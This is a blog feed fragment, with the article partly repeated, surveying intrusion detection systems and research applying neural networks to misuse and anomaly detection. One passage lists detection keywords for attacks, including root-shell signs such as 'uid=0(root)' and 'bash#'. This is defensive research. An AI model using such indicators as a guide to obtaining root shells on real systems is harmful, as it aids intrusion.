Deraison.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Performance of commercial tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The majority of tools available today rely on the misuse detection model, meaning that administrators need to regularly update the vulnerability database. As a result, all these tools are vulnerable to attacks with new signatures.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Tools are also very sensitive to false alarms, corresponding to normal network traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Major commercial IDS do not handle Fragmentation / re-assembly of IP packets. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For large networks, it would be necessary to store Gigabytes of event data every day and process them off-line.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Application of Neural Networks to Intrusion Detection&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The Center for Education and Research in Information Assurance and Security (CERIAS) has produced a review of IDS research prototypes [4], and a few are now commercial products.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for misuse detection &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  
&gt;Approaches for the misuse detection model are :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;expert systems, containing a set of rules that      describe attacks&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;signature verification, where attack scenarios      are translated into sequences of audit events&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Petri nets, where known attacks are represented      with graphical Petri nets&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;state-transition diagrams, representing attacks      with a set of goals and transitions&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The common approach to misuse detection is « signature verification », where a system detects previously seen, known attacks by looking for an invariant signature left by these attacks. This signature is found in audit files, on the compromised host machine, or in sniffers looking for packets inside or outside of the attacked machine.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The limitations of this approach are due to :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;frequent false-alarm detection&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;the need to specify a signature of the attack,      and then to update the attack signatures on every IDS tool. 
A signature of      an attack may not be easily discovered.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;new attack signatures are not automatically      discovered without update of the IDS&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for anomaly detection&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Anomaly Detection in Network-based or Host-based IDS includes :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;threshold detection detecting abnormal      activity on the server or network, for example abnormal consumption of the      CPU for one server, or abnormal saturation of the network&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;statistical measures, learned from historical      values&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;rule-based measures, with expert systems&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;non-linear algorithms such as Neural Networks or      Genetic algorithms&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The common approach for anomaly detection concerns the statistical analysis, where the user or the system behavior is measured by a number of variables over the time. These variables may be the login and the logout time of each session, the amount of resources consumed during the session, and the resource duration. 
The major limitation of this approach is to find a correct threshold without frequent false-alarm detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;DARPA Intrusion Detection Data Base&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;To improve performances of IDS systems with real network traffic, a large-scale realistic Intrusion Detection data-base has been sponsored by the US Defense Advanced Research Projects Agency ( DARPA ) in 1998. More than two months of traffic observed from US Government sites and the Internet were registered, adding attacks against various hosts OS. DARPA data-base was then designed to evaluate performances of Intrusion Detection Systems. The first evaluation with off-line and real-time Data Base was conducted in the summer of 1998 [5].&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Network approach for Intrusion Detection&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;One promising research in Intrusion Detection concerns the application of the Neural Network techniques, for the misuse detection model and the anomaly detection model. 
Performance evaluations presented in this paper all refer to the DARPA Intrusion Data Base.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;strong&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Network approach&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;An artificial Neural Network consists of a collection of treatments to transform a set of inputs to a set of searched outputs, through a set of simple processing units, or nodes and connections between them. Subsets of the units are input nodes, output nodes, and nodes between input and output form hidden layers ; the connection between two units has some weight, used to determine how much one unit will affect the other. Two types of architecture of Neural Networks can be distinguished :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Supervised training algorithms, where in the      learning phase, the network learns the desired output for a given input or      pattern. The well known architecture of supervised neural network is the      Multi-Level Perceptron (MLP) ; the MLP is employed for Pattern      Recognition problems.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Unsupervised training algorithms, where in the      learning phase, the network learns without specifying desired output.      Self-Organizing Maps ( SOM ) are popular unsupervised training      algorithms ; a SOM tries to find a topological mapping from the input      space to clusters. SOM are employed for classification problems.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A good introduction to Neural Networks is available in [6]. 
The most important property of a Neural Network is to automatically learn / retrain coefficients in the Neural Network according to data inputs and data outputs. Applying the Neural Network (NN) approach to Intrusion Detection, we first have to expose NN to normal data and to attacks to automatically adjust coefficients of the NN during the training phase. Performance tests are then conducted with real network traffic and attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Networks have been largely employed with success for complex problems such as Pattern Recognition, hand-written character recognition, Statistical Analysis. We present four recent studies on the application of the Neural Network approach to the scope of Intrusion Detection, both for the misuse detection model and the anomaly detection model.&lt;/span&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt; Representation of a Perceptron with one Hidden Layer ( from [8] )&lt;/span&gt;&lt;br /&gt;&lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Georgia University neural network IDS&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;J Cannady and J Mahaffey [7] of Georgia Technical Research Institute (GTRI ) conducted research to apply Multi-Level Perceptron (MLP) model and MLP/SOM (Self-Organizing Maps) for misuse detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The MLP prototype had these characteristics : 4 fully connected layers, 9 input nodes and 2 output nodes ( normal and attack ). 
With this prototype, they simulated specific attacks such as ISS scans, SATAN scans and SYNFlood, and each attack was clearly identified within normal traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;An MLP/SOM prototype was then designed to detect dispersed and possibly collaborative attacks. The Neural Network was a feed-forward network with back-propagation learning. In the learning phase, the Neural Network converged rapidly. In preliminary results, unsuccessful FTP login attempts were correctly identified as attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;MIT research in neural network IDS&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;R Lippmann and R Cunningham [8, 9] of the MIT Lincoln Laboratory also conducted tests applying Neural Networks to the misuse detection model, by searching for attack-specific keywords in the network traffic. They used a Multi-Level Perceptron (MLP) to detect Unix-host attacks, and attacks to obtain root-privilege on a server. Generic keywords are selected to detect attack preparations and actions executed afterwards.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A two-layer perceptron was designed with k input nodes, 2k hidden nodes and 2 outputs ( normal and attack ) ; backpropagation in the learning phase determines the weights of the Neural Network. 
Good detection performance was obtained with 30 keywords to detect attacks, such as « cat &gt; », « uudecode » or signs of a new root shell (« uid=0(root) », « bash# »).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Applied to Shell source code with 7 shell-commands representing an attack, 17 out of 20 attacks were detected and one false alarm generated ; applied to C source code with 2 features, 68 of 73 attacks were detected, with 4 false alarms.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;With the Neural Network approach, false alarms were reduced by two orders of magnitude ( to roughly one false alarm per day ) and the detection rate increased to roughly 80 % with the DARPA data base. The system could detect old as well as new attacks not included in the training data, and to a lesser extent attacks distributed across multiple sessions.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;UBILAB Laboratory&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Luc Girardin of the UBILAB laboratory [ 10, 11] also employed Self-Organizing Maps ( SOM ) to perform clustering of network traffic and detect attacks based upon Neural Network, associated with a visual approach of network traffic. SOM are employed to project network events on an appropriate 2D-space for visualization, and then they are displayed to the Network Administrator with a comprehensive view of traffic. 
Intrusions are then easily extracted from this view, by highlighting divergence from the norm with visual metaphors of network traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Girardin tested this approach with success for the following attacks : IP spoofing, FTP password guessing, network scanning and network hopping ; log file systems are analyzed from firewalls. However, this approach needs a visual interpretation of network traffic by an administrator to detect attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Research of RST Corporation&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A Ghosh and A Schwartzbard [12] of Reliable Software Technologies Corp. used the Neural Network approach for the anomaly detection model by analyzing program behavior profiles for Intrusion Detection. Program behavior profiles are built by capturing system calls made by the program, to monitor the behavior of programs by noting irregularities in program behavior.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Their IDS was a single hidden layer Multi-Layer Perceptron (MLP) ; they also employed the so-called Lucky Bucket algorithm to keep in mind temporal memorization of recent abnormal events, by managing a counter : for a normal output, the counter tends to be zero, and for an anomaly the counter tends to be one.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Performance for their system was tested with the DARPA data-base, including intrusive and non-intrusive sessions. 
Applied to anomaly detection, the system detects known and new attacks with good performance ( 77 % of attacks were detected with 3 % of false alarms ), but applied to misuse detection it detects attacks with high false alarm rates, which rules out commercial use. In 1998, with the DARPA off-line IDS evaluation, the system successfully detected User-to-Root attacks composed of system-call sequences.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In order to improve the anomaly detection model, A Ghosh et al. [13] then tested Intrusion Detection with another topology of Neural Network, the Elman Network, for recognizing recurrent features in program execution traces. An Elman Network is based on a feed-forward topology with the addition of context nodes retaining information from previous inputs. Applied to the DARPA database, the Elman Networks were able to detect 77 % of attacks with &lt;b&gt;no false alarm&lt;/b&gt;, improving results obtained with the MLP topology.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In 1999, during the evaluation of performance tests with other systems and applying the DARPA data-base, this system had promising results with anomaly detection to detect new attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems are becoming widely employed as a fundamental Network Security system. 
Commercial tools available today have limitations in detecting real intrusions, and Neural Network is an efficient way to improve the performance of IDS systems which are based on the misuse detection model and the anomaly detection model.&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/4964442673905788038/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=4964442673905788038' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4964442673905788038'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4964442673905788038'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/application-of-neural-networks-to_25.html' title='Application of Neural Networks to Intrusion Detection'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-8107702510982510456</id><published>2008-03-25T11:58:00.000-07:00</published><updated>2008-03-25T12:19:22.762-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Application of Neural Networks to Intrusion Detection</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span 
style=";font-family:Arial;font-size:10;"  &gt;Introduction&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems ( IDS ) are now mainly employed to secure company networks. Ideally, an IDS has the capacity to detect in real-time all ( attempted ) intrusions, and to execute work to stop the attack ( for example, modifying firewall rules ). We present in this paper a « state of the art » of Intrusion Detection Systems, developing commercial and research tools, and a new way to improve false-alarm detection using Neural Network approach. This approach is still in development, nevertheless it seems to be very promising for the future.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;This paper is organized as follows : first, we present the global architecture of IDS and a few commercially available tools, then we analyze new axes of research to improve IDS’s performances and particularly the application of Neural Networks to Intrusion Detection.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Classification of Intrusion Detection Systems&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A guidance document on Intrusion Detection Systems is available from National Institute of Standards and Technology ( NIST ) organization [1].&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems can be classified into three categories :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;host-based IDS, evaluate information found on a      single or multiple host systems, including contents of operating systems,      system and application files.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span 
style=";font-family:Arial;font-size:10;"  &gt;network-based IDS, evaluate information captured from network communications, analyzing the stream of packets traveling across the network. Packets are captured through a set of sensors.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;vulnerability-assessment IDS, detect vulnerabilities on internal networks and firewalls&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;There are two primary models for analyzing events to detect attacks:&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;misuse detection model : IDS detect intrusions by looking for activity that corresponds to known signatures of intrusions or vulnerabilities&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;anomaly detection model : IDS detect intrusions by searching for « abnormal » network traffic&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Most IDS commercial tools rely on the misuse detection model, and signatures of intrusions must always be updated by vendors.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;IDS based on the anomaly detection model have the ability to detect symptoms of attacks without specifying a model of attacks, but they are very sensitive to false alarms.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Commercially available tools&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A 
Jackson [2] of Los Alamos National Laboratory wrote a complete survey of IDS products. Characteristics for each of the seventeen products are studied according to nine major features :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;suitability for IDS architecture and management scheme&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;flexibility of adaptation for a specific network to be monitored&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;protection against malicious tampering&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;interoperability with other network management and security tools&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;comprehensiveness, to expand the concept of intrusion detection such as blocking Java applets or Active-X controls, monitoring e-mail content, blocking specific urls&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;event management, such as managing and reporting event trace, updating attack database&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;active response when an attack occurs, such as firewall or router reconfiguration&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;support for product&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Another recent market survey 
of commercially available Intrusion Detection tools is available in [3]. We present here examples of IDS tools, classified according to the three models : host-based, network-based and vulnerability-assessment tools.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Host-based IDS tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Host-based IDS systems detect attacks for an individual system, using system logs and operating system audit trails. Examples of well known host-based commercial tools are : Cybercop from Network Associates ( NAI ) ( http://www.pgp.com ) and KaneSecurity Monitor ( KSM ) from RSA Security ( http://www.rsasecuriy.com ). Tripwire ( http://www.tripwire.org ) is a specific tool to detect changes of administrative or user files on one server.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Network-based IDS tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Network-based IDS systems detect attacks by capturing and analyzing network packets, from « sensors » placed at various points in a network. 
Examples of well known Network-based commercial tools are : RealSecure from Internet Security Scanner ( ISS ) ( http://www.iss.net ), Cisco Secure IDS or NetRanger from Cisco Systems ( ex Wheel Group Corporation ), Centrax from CyberSafe corporation, and Network Flight Recorder NFR.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A popular and freely-available Network-based IDS is Snort, a lightweight IDS ( http://www.snort.org ).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The main difficulty for Network-based IDS is to process in real-time all packets for a large network ; specific hardware solutions may be employed. Another problem is the segmentation of networks by switches, which makes it difficult to capture traffic for the whole network.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Vulnerability-assessment tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Vulnerability-assessment tools are security scanners used to detect known vulnerabilities in a specific Operating System’s configuration. Examples of well-known vulnerability-assessment tools are : CyberCop Scanner from PGP Security ( a Network Associates Division ) and SecureScan NX from Networks Vigilance ( formerly known as NV e-secure ).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A freely-available vulnerability-assessment tool is Nessus, a Linux-based vulnerability scanner ( http://www.nessus.org ) written by R. 
Deraison&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Performances for commercial tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The majority of tools available today refer to the misuse detection model, meaning that administrators need to regularly update vulnerabilities database. Then, all these tools are vulnerable to new signatures of attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Tools are also very sensitive to false attacks, corresponding to normal network traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Major commercial IDS do not handle Fragmentation / re-assembly of IP packets. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For large networks, it would be necessary to store Gigabytes of event data every day, to treat them off-line.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Application of Neural Networks to Intrusion Detection&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The Center for Education and Research in Information Assurance and Security (CERIAS) has produced a review of IDS research prototypes [4], and a few are now commercial products.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for misuse detection &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  
&gt;Approaches for the misuse detection model are :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;expert systems, containing a set of rules that describe attacks&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;signature verification, where attack scenarios are translated into sequences of audit events&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Petri nets, where known attacks are represented with graphical Petri nets&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;state-transition diagrams, representing attacks with a set of goals and transitions&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The common approach for misuse detection concerns « signature verification », where a system detects previously seen, known attacks by looking for an invariant signature left by these attacks. This signature is found in audit files, on the intruded host machine, or by sniffers looking for packets inside or outside of the attacked machine.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The limitations of this approach are :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span 